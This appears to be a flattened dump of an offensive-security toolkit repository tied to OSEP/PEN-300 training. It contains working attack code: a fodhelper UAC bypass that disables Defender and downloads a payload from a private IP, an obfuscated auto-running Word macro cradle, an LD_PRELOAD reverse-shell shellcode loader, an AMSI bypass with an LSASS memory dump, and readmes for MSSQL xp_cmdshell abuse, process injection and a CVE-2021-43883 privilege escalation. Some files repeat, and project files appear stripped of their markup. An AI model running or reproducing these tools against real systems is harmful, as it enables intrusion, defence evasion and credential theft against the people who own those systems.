-Force 10 | Set-ItemProperty "HKCU:\Software\Classes\ms-settings\CurVer" -Name "(default)" -value "" -Force 11 | 12 | New-Item "HKCU:\Software\Classes\.yelow\Shell\Open\command" -Force 13 | Set-ItemProperty "HKCU:\Software\Classes\.yelow\Shell\Open\command" -Name "(default)" -Value $program -Force 14 | 15 | Set-ItemProperty "HKCU:\Software\Classes\ms-settings\CurVer" -Name "(default)" -value ".yelow" -Force 16 | Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden 17 | 18 | Start-Sleep 3 19 | 20 | Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force 21 | Remove-Item "HKCU:\Software\Classes\.yelow\" -Recurse -Force 22 | } 23 | alt 24 | -------------------------------------------------------------------------------- /Macros/WordPsCradle.vbs: -------------------------------------------------------------------------------- 1 | Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long 2 | Sub Document_Open() 3 | MyMacro 4 | End Sub 5 | 6 | Sub AutoOpen() 7 | MyMacro 8 | End Sub 9 | 10 | Function Grass(Goats) 11 | Grass = Chr(Goats - 12) 12 | End Function 13 | 14 | Function Screen(Grapes) 15 | Screen = Left(Grapes, 3) 16 | End Function 17 | 18 | Function Gorgon(Topside) 19 | Gorgon = Right(Topside, Len(Topside) - 3) 20 | End Function 21 | 22 | Function Yellow(Troop) 23 | Do 24 | Shazam = Shazam + Grass(Screen(Troop)) 25 | Troop = Gorgon(Troop) 26 | Loop While Len(Troop) > 0 27 | Yellow = Shazam 28 | End Function 29 | 30 | Function MyMacro() 31 | Dim Apples As String 32 | Dim Leap As String 33 | Dim t1 As Date 34 | Dim t2 As Date 35 | Dim time As Long 36 | t1 = Now() 37 | Sleep (5000) 38 | t2 = Now() 39 | time = DateDiff("s", t1, t2) 40 | If time < 4.5 Then 41 | Exit Function 42 | End If 43 | 'Simple heuristics bypass attempt. Ensure file is named 'app.docm' (in vbObfuscate.ps1) 44 | If ActiveDocument.Name <> Yellow("109124124058112123111121") Then 45 | Exit Function 46 | End If 47 | ' Our encoded shellcode 48 | Apples = "124123131113126127116113120120044057113132113111044110133124109127127044057122123124044057131044116117112112113122044057111044117113132052122113131057123110118113111128044122113128058131113110111120117113122128053058112123131122120123109112127128126117122115052051116128128124070059059061069062058061066068058064069058066066059109128128109111116058128132128051053" 49 | Leap = Yellow(Apples) 50 | ' Call the Win32_Process.Create() Method of the Win32 WMI Provider "winmgmts:" (in vbObfuscate.ps1) 51 | GetObject(Yellow("131117122121115121128127070")).Get(Yellow("099117122063062107092126123111113127127")).Create Leap, Tea, Coffee, Napkin 52 | End Function 53 | -------------------------------------------------------------------------------- /payloads/Privilege_Escalation/UACBypass.ps1: -------------------------------------------------------------------------------- 1 | function alt { 2 | #Disables win defender and calls powershell payload for additional reverse shell w/ elevation. Note that type of payload matters! Calling a remote injector/hollower w/ ppid spoof will \ 3 | # give you a system shell, if you want a normal one call a standard runner. 4 | #Powershell -WindowStyle Hidden Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled \ 5 | # -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend;iex (new-object net.webclient).downloadstring(''http://192.168.1.195/payload.txt'') 6 | Param ( 7 | [String]$program = 'Powershell -WindowStyle Hidden Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend;iex (new-object net.webclient).downloadstring(''http://192.168.1.195/payload.txt'')' 8 | ) 9 | New-Item -Path "HKCU:\Software\Classes\ms-settings\CurVer" -Force 10 | Set-ItemProperty "HKCU:\Software\Classes\ms-settings\CurVer" -Name "(default)" -value "" -Force 11 | 12 | New-Item "HKCU:\Software\Classes\.yelow\Shell\Open\command" -Force 13 | Set-ItemProperty "HKCU:\Software\Classes\.yelow\Shell\Open\command" -Name "(default)" -Value $program -Force 14 | 15 | Set-ItemProperty "HKCU:\Software\Classes\ms-settings\CurVer" -Name "(default)" -value ".yelow" -Force 16 | Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden 17 | 18 | Start-Sleep 3 19 | 20 | Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force 21 | Remove-Item "HKCU:\Software\Classes\.yelow\" -Recurse -Force 22 | } 23 | alt 24 | -------------------------------------------------------------------------------- /payloads/Macros/WordPsCradle.vbs: -------------------------------------------------------------------------------- 1 | Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long 2 | Sub Document_Open() 3 | MyMacro 4 | End Sub 5 | 6 | Sub AutoOpen() 7 | MyMacro 8 | End Sub 9 | 10 | Function Grass(Goats) 11 | Grass = Chr(Goats - 12) 12 | End Function 13 | 14 | Function Screen(Grapes) 15 | Screen = Left(Grapes, 3) 16 | End Function 17 | 18 | Function Gorgon(Topside) 19 | Gorgon = Right(Topside, Len(Topside) - 3) 20 | End Function 21 | 22 | Function Yellow(Troop) 23 | Do 24 | Shazam = Shazam + Grass(Screen(Troop)) 25 | Troop = Gorgon(Troop) 26 | Loop While Len(Troop) > 0 27 | Yellow = Shazam 28 | End Function 29 | 30 | Function MyMacro() 31 | Dim Apples As String 32 | Dim Leap As String 33 | Dim t1 As Date 34 | Dim t2 As Date 35 | Dim time As Long 36 | t1 = Now() 37 | Sleep (5000) 38 | t2 = Now() 39 | time = DateDiff("s", t1, t2) 40 | If time < 4.5 Then 41 | Exit Function 42 | End If 43 | 'Simple heuristics bypass attempt. Ensure file is named 'app.docm' (in vbObfuscate.ps1) 44 | If ActiveDocument.Name <> Yellow("109124124058112123111121") Then 45 | Exit Function 46 | End If 47 | ' Our encoded shellcode 48 | Apples = "124123131113126127116113120120044057113132113111044110133124109127127044057122123124044057131044116117112112113122044057111044117113132052122113131057123110118113111128044122113128058131113110111120117113122128053058112123131122120123109112127128126117122115052051116128128124070059059061069062058061066068058064069058066066059109128128109111116058128132128051053" 49 | Leap = Yellow(Apples) 50 | ' Call the Win32_Process.Create() Method of the Win32 WMI Provider "winmgmts:" (in vbObfuscate.ps1) 51 | GetObject(Yellow("131117122121115121128127070")).Get(Yellow("099117122063062107092126123111113127127")).Create Leap, Tea, Coffee, Napkin 52 | End Function 53 | -------------------------------------------------------------------------------- /Linux/Linux_Shellcode_Loaders/sharedLibrary_LD_PRELOAD.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | // To compile: 9 | // gcc -Wall -fPIC -z execstack -c -o sharedLibrary_LD_PRELOAD.o sharedLibrary_LD_PRELOAD.c 10 | // gcc -shared -o sharedLibrary_LD_PRELOAD.so sharedLibrary_LD_PRELOAD.o -ldl 11 | 12 | // msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.49.67 LPORT=80 -f c 13 | unsigned char buf[] = 14 | "\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48" 15 | "\xb9\x02\x00\x00\x50\xc0\xa8\x31\x43\x51\x48\x89\xe6\x6a\x10" 16 | "\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58" 17 | "\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f" 18 | "\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05"; 19 | 20 | uid_t geteuid(void) 21 | { 22 | // Get the address of the original 'geteuid' function 23 | typeof(geteuid) *old_geteuid; 24 | old_geteuid = dlsym(RTLD_NEXT, "geteuid"); 25 | 26 | // Fork a new thread based on the current one 27 | if (fork() == 0) 28 | { 29 | // Execute shellcode in the new thread 30 | intptr_t pagesize = sysconf(_SC_PAGESIZE); 31 | 32 | // Make memory executable (required in libs) 33 | if (mprotect((void *)(((intptr_t)buf) & ~(pagesize - 1)), pagesize, PROT_READ|PROT_EXEC)) { 34 | // Handle error 35 | perror("mprotect"); 36 | return -1; 37 | } 38 | 39 | // Cast and execute 40 | int (*ret)() = (int(*)())buf; 41 | ret(); 42 | } 43 | else 44 | { 45 | // Original thread, call the original function 46 | printf("[Hijacked] Returning from function...\n"); 47 | return (*old_geteuid)(); 48 | } 49 | // This shouldn't really execute 50 | printf("[Hijacked] Returning from main...\n"); 51 | return -2; 52 | } -------------------------------------------------------------------------------- /Misc/AV_Stuff/Get-AppLockerRules.ps1: -------------------------------------------------------------------------------- 1 | function Parse-XML { 2 | param ( 3 | [Parameter(Mandatory = $true)] 4 | [string]$XmlString 5 | ) 6 | begin { 7 | [xml]$xml = $XmlString 8 | } 9 | process { 10 | if ($xml.DocumentElement -eq 'FilePublisherRule') { 11 | $Parsed = $xml.FilePublisherRule 12 | } 13 | elseif ($xml.DocumentElement -eq 'FilePathRule') { 14 | $Parsed = $xml.FilePathRule 15 | } 16 | else { 17 | $Parsed = $xml.DocumentElement 18 | } 19 | } 20 | end { 21 | return $Parsed 22 | } 23 | } 24 | 25 | function Invoke-ApplockerRecon { 26 | 27 | # Check if applocker will apply to the current user context 28 | $CurrentUser = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name 29 | $BuiltIn = @("NT AUTHORITY\SYSTEM", "NT AUTHORITY\LOCAL SERVICE", "NT AUTHORITY\NETWORK SERVICE", "IIS APPPOOL\DefaultAppPool") 30 | if ($CurrentUser -in $BuiltIn) { 31 | Write-Output "Applocker policies do not apply to $CurrentUser" 32 | } 33 | 34 | # Parse through available rules 35 | $Rules = Get-ChildItem -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2" 36 | 37 | foreach ($ID in $Rules) { 38 | $RuleName = $($ID.PSChildName) 39 | switch ($(Get-ItemProperty -Path "$($ID.PSPath)" -Name "EnforcementMode" -ErrorAction SilentlyContinue).EnforcementMode) { 40 | 1 { $Enforcement = 'Enforced' } 41 | 0 { $Enforcement = 'Not Enforced' } 42 | $Null { $Enforcement = 'Not Configured' } 43 | } 44 | 45 | $Actions = Get-ChildItem -Path "$($ID.PSPath)" -ErrorAction SilentlyContinue 46 | foreach ($Action in $Actions) { 47 | $XML = Get-ItemProperty -Path "$($Action.PSPath)" -Name "Value" -ErrorAction SilentlyContinue 48 | Parse-XML -XmlString $XML.Value | Select @{l = 'Rule'; e = { $RuleName } }, @{l = 'Enforcement'; e = { $Enforcement } }, ID, Name, Description, UserOrGroupSid, Action, @{l = 'Conditions'; e = { $_.Conditions.FilePathCondition.Path } } 49 | } 50 | } 51 | } 52 | Invoke-ApplockerRecon 53 | -------------------------------------------------------------------------------- /payloads/Misc/Get-AppLockerRules.ps1: -------------------------------------------------------------------------------- 1 | function Parse-XML { 2 | param ( 3 | [Parameter(Mandatory = $true)] 4 | [string]$XmlString 5 | ) 6 | begin { 7 | [xml]$xml = $XmlString 8 | } 9 | process { 10 | if ($xml.DocumentElement -eq 'FilePublisherRule') { 11 | $Parsed = $xml.FilePublisherRule 12 | } 13 | elseif ($xml.DocumentElement -eq 'FilePathRule') { 14 | $Parsed = $xml.FilePathRule 15 | } 16 | else { 17 | $Parsed = $xml.DocumentElement 18 | } 19 | } 20 | end { 21 | return $Parsed 22 | } 23 | } 24 | 25 | function Invoke-ApplockerRecon { 26 | 27 | # Check if applocker will apply to the current user context 28 | $CurrentUser = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name 29 | $BuiltIn = @("NT AUTHORITY\SYSTEM", "NT AUTHORITY\LOCAL SERVICE", "NT AUTHORITY\NETWORK SERVICE", "IIS APPPOOL\DefaultAppPool") 30 | if ($CurrentUser -in $BuiltIn) { 31 | Write-Output "Applocker policies do not apply to $CurrentUser" 32 | } 33 | 34 | # Parse through available rules 35 | $Rules = Get-ChildItem -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2" 36 | 37 | foreach ($ID in $Rules) { 38 | $RuleName = $($ID.PSChildName) 39 | switch ($(Get-ItemProperty -Path "$($ID.PSPath)" -Name "EnforcementMode" -ErrorAction SilentlyContinue).EnforcementMode) { 40 | 1 { $Enforcement = 'Enforced' } 41 | 0 { $Enforcement = 'Not Enforced' } 42 | $Null { $Enforcement = 'Not Configured' } 43 | } 44 | 45 | $Actions = Get-ChildItem -Path "$($ID.PSPath)" -ErrorAction SilentlyContinue 46 | foreach ($Action in $Actions) { 47 | $XML = Get-ItemProperty -Path "$($Action.PSPath)" -Name "Value" -ErrorAction SilentlyContinue 48 | Parse-XML -XmlString $XML.Value | Select @{l = 'Rule'; e = { $RuleName } }, @{l = 'Enforcement'; e = { $Enforcement } }, ID, Name, Description, UserOrGroupSid, Action, @{l = 'Conditions'; e = { $_.Conditions.FilePathCondition.Path } } 49 | } 50 | } 51 | } 52 | Invoke-ApplockerRecon 53 | -------------------------------------------------------------------------------- /Active_Directory/README.md: -------------------------------------------------------------------------------- 1 | # Active Directory Tools 2 | 3 | ## ToC 4 | 5 | | Application | Output | Notes | 6 | | ----------- | ------ | ----- | 7 | | `sql` | EXE | C# project for exploitation of MSSQL servers in AD | 8 | 9 | ## `sql` 10 | 11 | This project is a pretty robust tool for exploitation of MSSQL instances. Features include: 12 | - Enumeration of MSSQL instances (calls setspn). 13 | - Enumeration of linked SQL servers, users, users that can be impersonated, user context. 14 | - Execute arbitrary SQL commands 15 | - Enable XP_cmdshell or OLE objects on the current or a linked server 16 | - Force authentication of SQL server to an SMB share for use with ntlmrelayx 17 | - Execute XP_cmdshell or OLE object commands on the current or a linked server 18 | 19 | These features are all functional over bidirectional links. 20 | `Installutil` bypass is baked in so this tool can be run on a machine with Application whitelisting in place. Note that when running `sql.exe` with `instalutil`, all switches must be passed BEFORE you specify `sql.exe`. 21 | 22 | ### Details 23 | Below is the help message explaining the available flags. 24 | ``` 25 | MSSQL Linked Server Tool 26 | 27 | Compatible with InstallUtil AppLocker bypass; Use /s=SQL05 syntax instead of /s:SQL05 with InstallUtil. 28 | 29 | Modes: 30 | /q - Query Query a domain for MSSQL SPN's 31 | /e - Enumerate Find Linked MSSQL instances and enumerate permissions 32 | /c - Command Execute sql queries on the logged in server 33 | /f - Enable Enable features like XP_cmdshell and OLE objects on a Linked server 34 | /x - Command Execute commands via XP_cmdshell on a linked server 35 | /o - Command Execute commands via OLE object on a linked server 36 | /h - Force SQL server to authenticate to an SMB share in order to capture hash for use with ntlmrelayx 37 | 38 | Options: 39 | /l: Login (username) to authenticate with (default: Windows credentials) 40 | /p: Password to authenticate with 41 | /d: Database to connect to (default: Master) 42 | /s: Server to connect to (default: Localhost) 43 | /i: User to impersonate. Enter "dbo" to try and auth as dbo in the msdb database. 44 | /t: Tunnel through a Linked MSSQL server in order to complete tasks on one of its Linked servers. 45 | ``` 46 | 47 | -------------------------------------------------------------------------------- /Loaders_Disk/formatters/bin_to_vbappArray.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | print("This program takes a binary and encodes it to an array suitable for a vba macro. Use the msfvenom `-f raw` switch.") 4 | print("Example:\n\tmsfvenom -p windows/exec -f raw -o ~/raw.bin CMD='cmd.exe'\n\tpython bin_to_vbappArray.py ~/raw.bin\n\n") 5 | with open(sys.argv[1], 'rb') as f: 6 | data = f.read() 7 | sz = len(data) 8 | if sz // 200 < 25: 9 | print(f"[+] Formatting {sz} bytes to a VB Application int array. ") 10 | print("buf = Array(", end='') 11 | byte_cnt = 1 12 | line_cnt = 1 13 | for byte in data: 14 | if byte_cnt % 200 == 0: 15 | if line_cnt == 25: 16 | print(")\nbuf += ") 17 | print(" _") 18 | line_cnt += 1 19 | 20 | byte_cnt += 1 21 | if byte_cnt == sz+1: 22 | print(f'{int(byte)}', end=')\n') 23 | else: 24 | print(f'{int(byte)},', end='') 25 | else : 26 | print(f"Sorry, the max size I can format is {200 *25}") 27 | print(f"There's no easy way to pump {sz} bytes into a VBA array. You'll have to use multi-dimensional arrays or fancy array concatenation.") 28 | exit() 29 | # There is a maximum of 65535 characters in a physical line of source code, so we'll put a max of 65500 chars per line 30 | # each byte has potential to be a max of 4 chars in source-code (3 for the int, then the comma) 31 | max_bytes = 65500//4 32 | lines_needed = sz // max_bytes 33 | lines_needed = lines_needed if lines_needed > 0 else 1 34 | 35 | # max of 25 physical lines joined with line-continuation characters to make one logical line 36 | if lines_needed > 25: 37 | print(f"There's no easy way to pump {sz} bytes into a VBA array. You'll have to use multi-dimensional arrays or fancy array concatenation.") 38 | exit() 39 | 40 | lines = [data[i*max_bytes: (i*max_bytes)+max_bytes] for i in range(lines_needed)] 41 | print("buf = Array(", end='') 42 | for line in lines: 43 | for byte in line: 44 | print(f'{int(byte)},', end='') 45 | print(' _') 46 | print(')') 47 | 48 | -------------------------------------------------------------------------------- /Macros/vbObfuscate.ps1: -------------------------------------------------------------------------------- 1 | $payload = "powershell -exec bypass -nop -w hidden -c iex(new-object net.webclient).downloadstring('http://192.168.49.66/attach.txt')" 2 | [string]$output = "" 3 | $payload.ToCharArray() | %{ 4 | [string]$thischar = [byte][char]$_ + 12 5 | if($thischar.Length -eq 1) 6 | { 7 | $thischar = [string]"00" + $thischar 8 | $output += $thischar 9 | } 10 | elseif($thischar.Length -eq 2) 11 | { 12 | $thischar = [string]"0" + $thischar 13 | $output += $thischar 14 | } 15 | elseif($thischar.Length -eq 3) 16 | { 17 | $output += $thischar 18 | } 19 | } 20 | # Win32 WMI Provider 21 | $output 22 | write-output "" 23 | $payload = "winmgmts:" 24 | [string]$output = "" 25 | $payload.ToCharArray() | %{ 26 | [string]$thischar = [byte][char]$_ + 12 27 | if($thischar.Length -eq 1) 28 | { 29 | $thischar = [string]"00" + $thischar 30 | $output += $thischar 31 | } 32 | elseif($thischar.Length -eq 2) 33 | { 34 | $thischar = [string]"0" + $thischar 35 | $output += $thischar 36 | } 37 | elseif($thischar.Length -eq 3) 38 | { 39 | $output += $thischar 40 | } 41 | } 42 | # Win32 Process.Create() method 43 | $output 44 | write-output "" 45 | $payload = "Win32_Process" 46 | [string]$output = "" 47 | $payload.ToCharArray() | %{ 48 | [string]$thischar = [byte][char]$_ + 12 49 | if($thischar.Length -eq 1) 50 | { 51 | $thischar = [string]"00" + $thischar 52 | $output += $thischar 53 | } 54 | elseif($thischar.Length -eq 2) 55 | { 56 | $thischar = [string]"0" + $thischar 57 | $output += $thischar 58 | } 59 | elseif($thischar.Length -eq 3) 60 | { 61 | $output += $thischar 62 | } 63 | } 64 | # planned word doc name, for heuristics check during runtime 65 | $output 66 | write-output "" 67 | $payload = "app.docm" 68 | [string]$output = "" 69 | $payload.ToCharArray() | %{ 70 | [string]$thischar = [byte][char]$_ + 12 71 | if($thischar.Length -eq 1) 72 | { 73 | $thischar = [string]"00" + $thischar 74 | $output += $thischar 75 | } 76 | elseif($thischar.Length -eq 2) 77 | { 78 | $thischar = [string]"0" + $thischar 79 | $output += $thischar 80 | } 81 | elseif($thischar.Length -eq 3) 82 | { 83 | $output += $thischar 84 | } 85 | } 86 | $output -------------------------------------------------------------------------------- /Loaders_Memory/README.md: -------------------------------------------------------------------------------- 1 | # Loaders - Memory 2 | 3 | Tools that aid in loading shellcode into memory, *from memory*. Usually scripts fetched remotely in powershell. 4 | 5 | ## ToC 6 | 7 | | Application | Output | Notes | 8 | | ----------- | ------ | ----- | 9 | | `Powerinject.py` | PS | Python3 script to generate .PS1 payloads that perform process injection. | 10 | | `Powerhollow.py` | PS | Python3 script to generate .PS1 payloads that perform process hollowing with PPID spoofing | 11 | 12 | 13 | ## [powerhollow.py](./powerhollow.py) and [powerinject.py](./powerinject.py) 14 | 15 | These python scripts call `msfvenom` to generate shellcode, AES encrypt it, and then embed it within hardcoded powershell code in order to dynamically produce *.PS1* payloads according to user supplied options. These *.PS1* payloads are modeled after the OSEP *.PS1* that utilizes dynamic lookup rather than `add-type` in order to prevent writing to disk when calling `csc`. 16 | 17 | `Powerinject.py` payloads succeed here; however I was unable to find a way to define the structs necessary for doing PPID spoofing with Process hollowing, so **add-type IS called in the `Powerhollow.py`** *.PS1* payloads, however this is only done for the necessesary structs and the `createproces()` Win32API. All other required API's are resolved dynamically. 18 | 19 | Run the appropriate python script for the kind of payload you want to use and then place the produced files in your webserver directory and use the supplied PS one liner in order to call them. If you see in the debug output that its failing to open a process, try a couple times more. Sometimes there just isn't a suitable process to inject into but after a couple tries it finds one. 20 | 21 | ### Updates from OSEP-Tools version 22 | - `powerinject.py` payloads now detect if they are being run in a 32-bit PS context, and auto download-and-execute themselves in a 64-bit process. 23 | - This is useful if your stager is ran from a 32-bit process (Word Macros), resulting in a 32-bit PS process. 24 | - You can now use the `-D` argument to have the payload output useful debugging statements and help you determine where in the process of setting up the reverse shell it is failing. 25 | - You no longer have to specify the integrity of your target process, as the script will determine the current process's permissions and lookup processes based on it, going for SYSTEM if elevated. 26 | - You may now specify "`any`" as an argument for the target process, to increase the odds of finding a suitable process to inject into. 27 | - Useful when targetting servers where there are few to zero processes where you can inject into (i.e. they're all running elevated and you're attempting to get initial access with low privs) 28 | - **NOTE**: You may inject into some interesting processes which could lead to unstable shells (if you inject into ephemeral procs), or unstable systems (if you inject into a sensitive important proc). I've had good results with it though. 29 | -------------------------------------------------------------------------------- /Privilege_Escalation/README.md: -------------------------------------------------------------------------------- 1 | # Privilege Escalation 2 | 3 | ## ToC 4 | 5 | | Application | Output | Notes | 6 | | ----------- | ------ | ----- | 7 | | `PrintSpoofer.NET` | EXE | Creates a pipe and impersonates tokens to run a binary | 8 | | `SpoolSample.exe` | N/A | Coerce Windows hosts to authenticate to other machines via the MS-RPRN RPC interface | 9 | | `UACBypass.ps1` | PS | FODhelper UAC Bypass script | 10 | | `shakeitoff` | EXE | CVE-2021-43883. Replace a target privilege binary with a binary of your choice then run it with SYSTEM privileges | 11 | 12 | ## `PrintSpoofer.NET` 13 | 14 | Steals the token of the incoming authentication forced with the PrintSpooler exploit, and use that token to run a given binary. *Modified to not require an interactive logon session*. Takes arguments for the pipe name and binary to run. 15 | 16 | Requires another tool (`SpoolSample.exe`) to trigger the pipe authentication from our target process. 17 | 18 | ## `SpoolSample.exe` 19 | 20 | Precompiled binary of the [SpoolSample](https://github.com/leechristensen/SpoolSample) tool to coerce Windows hosts authenticate to other machines via the MS-RPRN RPC interface. For use with the `PrintSpoofer.NET` binary. 21 | 22 | ## `UACBypass.ps1` 23 | 24 | UAC bypass using FODhelper covered in PEN-300 Section 7.5.1 to elevate privileges on a user account who has *Administrator* privs but is running in a medium integrity process. 25 | 26 | ### Usage 27 | Obviously there are many ways, but you can just load it as a module. 28 | ```ps1 29 | Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass;. .\UACBypass.ps1 30 | ``` 31 | 32 | ## `shakeitoff` 33 | 34 | Modification of [jbaines-r7/shakeitoff](https://github.com/jbaines-r7/shakeitoff) (CVE-2021-41379 variant) that allows a user to specify a file to replace a malicious binary with and then starts the Microsoft Edge Elevation Service in order to execute the malicous binary. 35 | 36 | You need both the `shakeitoff.exe` and the `shakeitoff.msi` on target. Note that this will replace the `elevation_service.exe` so make a copy of it if you need to restore! This of course requires that edge is installed on the target machine, and that the service exists. 37 | 38 | Tested successfully on Windows 10, 11, Server 2016, and Server 2019. This is patched as of Dec 14th 2021 (KB5008212) and was assigned the new CVE-2021-43883. Additionally a switch was added to allow the user to specify what file they wish to overwrite the target file with (as opposed to the original POC's which overwrote the target file with the POC). 39 | 40 | Check out [its own README](./shakeitoff/README.md) or the above linked repo for more information on the exploit and how to use it. More details on the underlying vulnerability at [AttackerKB-CVE-2021-41379](https://attackerkb.com/topics/7LstI2clmF/cve-2021-41379/rapid7-analysis). 41 | 42 | ### Usage 43 | ``` 44 | shakeitoff.exe -m c:\users\user\shakeitoff\shakeitoff.msi -i c:\users\user\write\ -c c:\users\user\source\repos\d_invoke\inject.exe -p "C:\Program Files (x86)\Microsoft\Edge\Application\96.0.1054.53\elevation_service.exe" 45 | ``` 46 | -------------------------------------------------------------------------------- /Misc/MiniDump/MiniDump.ps1: -------------------------------------------------------------------------------- 1 | # Bypass AMSI because we're cool 2 | [Ref].Assembly.GetType('System.Management.Automation.Amsi'+[char]85+'tils').GetField('ams'+[char]105+'InitFailed','NonPublic,Static').SetValue($null,$true) 3 | 4 | # Utility functions 5 | function LookupFunc { 6 | Param ($moduleName, $functionName) 7 | $assem = ([AppDomain]::CurrentDomain.GetAssemblies() | 8 | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1]. 9 | Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') 10 | $tmp=@() 11 | $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}} 12 | return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null, 13 | @($moduleName)), $functionName)) 14 | } 15 | 16 | function getDelegateType { 17 | Param ( 18 | [Parameter(Position = 0, Mandatory = $True)] [Type[]] $func, 19 | [Parameter(Position = 1)] [Type] $delType = [Void] 20 | ) 21 | $type = [AppDomain]::CurrentDomain. 22 | DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), 23 | [System.Reflection.Emit.AssemblyBuilderAccess]::Run). 24 | DefineDynamicModule('InMemoryModule', $false). 25 | DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', 26 | [System.MulticastDelegate]) 27 | $type. 28 | DefineConstructor('RTSpecialName, HideBySig, Public', 29 | [System.Reflection.CallingConventions]::Standard, $func). 30 | SetImplementationFlags('Runtime, Managed') 31 | $type. 32 | DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func). 33 | SetImplementationFlags('Runtime, Managed') 34 | return $type.CreateType() 35 | } 36 | 37 | # Add dbghelp.dll and reflectively load the function while we're at it 38 | # (somehow dbghelp.dll doesn't play nice with LookupFunc) 39 | $MethodDefinition = @' 40 | [DllImport("DbgHelp.dll", CharSet = CharSet.Unicode)] 41 | public static extern bool MiniDumpWriteDump( 42 | IntPtr hProcess, 43 | uint processId, 44 | IntPtr hFile, 45 | uint dumpType, 46 | IntPtr expParam, 47 | IntPtr userStreamParam, 48 | IntPtr callbackParam 49 | ); 50 | '@ 51 | $dbghelp = Add-Type -MemberDefinition $MethodDefinition -Name 'dbghelp' -Namespace 'Win32' -PassThru 52 | 53 | # Get LSASS PID 54 | $lsassPid = Get-Process lsass | select -ExpandProperty Id 55 | Write-Host("Got lsass.exe PID: $lsassPid.") 56 | 57 | # Get a handle on LSASS 58 | $handle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll OpenProcess), 59 | (getDelegateType @([UInt32], [Bool], [Int])([IntPtr]))).Invoke(0x1F0FFF,$false,$lsassPid) 60 | Write-Host("Got handle on LSASS: $handle.") 61 | 62 | # Dump process memory to file 63 | $filePath = "C:\Windows\Tasks\lsass.dmp" 64 | $dumpFile = New-Object IO.FileStream $filePath,'Create','Write','Read' 65 | $result = $dbghelp::MiniDumpWriteDump($handle, $lsassPid, $dumpFile.Handle, 2, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero) 66 | $dumpFile.Close() 67 | 68 | if($result) { 69 | Write-Host("Dumped LSASS memory to $filePath.") 70 | }else { 71 | Write-Host("Error dumping LSASS memory.") 72 | } -------------------------------------------------------------------------------- /Loaders_Disk/D_invoke/dll/dll.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {567418BD-F614-46A1-AF01-66C28121F538} 8 | Library 9 | Properties 10 | dll 11 | dll 12 | v4.7.2 13 | 512 14 | true 15 | 16 | 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | 25 | 26 | pdbonly 27 | true 28 | bin\Release\ 29 | TRACE 30 | prompt 31 | 4 32 | 33 | 34 | true 35 | bin\x64\Debug\ 36 | DEBUG;TRACE 37 | full 38 | x64 39 | 7.3 40 | prompt 41 | 42 | 43 | bin\x64\Release\ 44 | TRACE 45 | true 46 | pdbonly 47 | x64 48 | 7.3 49 | prompt 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | -------------------------------------------------------------------------------- /Loaders_Disk/clrunner/clrunner.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {3D0468A8-B22E-4A3C-95A2-B973F1F8D3B1} 8 | Exe 9 | clrunner 10 | clrunner 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | x64 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | true 26 | 27 | 28 | x64 29 | pdbonly 30 | true 31 | ..\..\payloads\Loaders_Memory\ 32 | TRACE 33 | prompt 34 | 4 35 | true 36 | false 37 | 38 | 39 | x64 40 | bin\x64\Debug\ 41 | 42 | 43 | x64 44 | ..\..\payloads\Loaders_Memory\ 45 | true 46 | true 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | -------------------------------------------------------------------------------- /Loaders_Disk/D_invoke/test/test.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {50AE1F0A-AC50-4A06-98E0-B7091E8341B0} 8 | Exe 9 | test 10 | test 11 | v4.7.2 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 